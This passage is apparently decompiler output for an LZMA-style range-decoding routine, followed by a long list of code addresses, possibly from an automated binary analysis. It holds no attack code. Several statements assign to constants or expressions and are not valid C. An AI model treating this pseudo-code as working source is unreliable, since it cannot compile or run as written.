							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                        0x00000000
                                                                                                        0x0040647d
                                                                                                        0x0040647d
                                                                                                        0x00406481
                                                                                                        0x00406538
                                                                                                        0x0040653b
                                                                                                        0x00406547
                                                                                                        0x00406428
                                                                                                        0x00406428
                                                                                                        0x0040642b
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00406813
                                                                                                        0x00406813
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x004067ee
                                                                                                        0x004067ee
                                                                                                        0x004067f2
                                                                                                        0x004069a1
                                                                                                        0x00000000
                                                                                                        0x004069a1
                                                                                                        0x004067fe
                                                                                                        0x00406805
                                                                                                        0x0040680d
                                                                                                        0x00406810
                                                                                                        0x00000000
                                                                                                        0x00406810
                                                                                                        0x00406487
                                                                                                        0x0040648b
                                                                                                        0x004069cc
                                                                                                        0x004069cc
                                                                                                        0x004069cf
                                                                                                        0x004069d3
                                                                                                        0x004069d3
                                                                                                        0x00406491
                                                                                                        0x00406497
                                                                                                        0x0040649a
                                                                                                        0x0040649e
                                                                                                        0x004064a1
                                                                                                        0x004064a5
                                                                                                        0x0040696b
                                                                                                        0x004069b7
                                                                                                        0x004069bf
                                                                                                        0x004069c6
                                                                                                        0x004069c8
                                                                                                        0x00000000
                                                                                                        0x004069c8
                                                                                                        0x004064ab
                                                                                                        0x004064ae
                                                                                                        0x004064b4
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b9
                                                                                                        0x004064bc
                                                                                                        0x004064bf
                                                                                                        0x004064c2
                                                                                                        0x004064c5
                                                                                                        0x004064c8
                                                                                                        0x004064c9
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064ce
                                                                                                        0x004064d1
                                                                                                        0x004064d4
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064da
                                                                                                        0x004064dc
                                                                                                        0x004064dc
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fbe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x00000000
                                                                                                        0x00405fcf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fd8
                                                                                                        0x00405fdb
                                                                                                        0x00405fde
                                                                                                        0x00405fe2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fe8
                                                                                                        0x00405feb
                                                                                                        0x00405fed
                                                                                                        0x00405fee
                                                                                                        0x00405ff1
                                                                                                        0x00405ff3
                                                                                                        0x00405ff4
                                                                                                        0x00405ff6
                                                                                                        0x00405ff9
                                                                                                        0x00405ffe
                                                                                                        0x00406003
                                                                                                        0x0040600c
                                                                                                        0x0040601f
                                                                                                        0x00406022
                                                                                                        0x0040602e
                                                                                                        0x00406056
                                                                                                        0x00406058
                                                                                                        0x00406066
                                                                                                        0x00406066
                                                                                                        0x0040606a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x0040605a
                                                                                                        0x0040605d
                                                                                                        0x0040605e
                                                                                                        0x0040605e
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x00406034
                                                                                                        0x00406039
                                                                                                        0x00406039
                                                                                                        0x00406042
                                                                                                        0x0040604a
                                                                                                        0x0040604d
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00406053
